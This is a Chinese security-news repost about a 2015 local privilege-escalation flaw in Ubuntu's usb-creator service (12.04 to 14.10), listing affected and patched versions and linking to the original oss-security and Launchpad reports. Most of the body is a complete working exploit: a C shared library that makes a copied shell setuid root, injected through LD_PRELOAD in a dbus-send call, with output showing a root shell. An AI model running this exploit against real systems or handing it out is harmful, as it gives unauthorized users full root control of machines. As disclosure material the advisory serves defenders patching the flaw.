记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Ubuntu曝本地权限提升漏洞,影响12.04 – 14.10版本(含EXP)

2015-04-25 16:00

14298481337071.jpg!small

Ubuntu曝出本地权限提升漏洞,该漏洞由Google的大神Tavis Ormandy发出,包含漏洞利用测试程序。

影响范围

Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)

漏洞测试EXP

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown(“/tmp/test”, 0, 0);
chmod(“/tmp/test”, 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,”foo”,XAUTHORITY,”foo”,LD_PRELOAD,”/tmp/test.so”
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

更多资料: http://www.openwall.com/lists/oss-security/2015/04/22/12
漏洞报告: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396

消息来源FreeBuf小酒馆,转载来自FreeBuf黑客与极客(FreeBuf.COM)

转载Ubuntu曝本地权限提升漏洞,影响12.04 – 14.10版本(含EXP)请注明出自:安全盒子

知识来源: www.secbox.cn/hacker/0day/2860.html

阅读:80288 | 评论:0 | 标签:0day/Exp Ubuntu 本地权限提升 exp 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“Ubuntu曝本地权限提升漏洞,影响12.04 – 14.10版本(含EXP)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云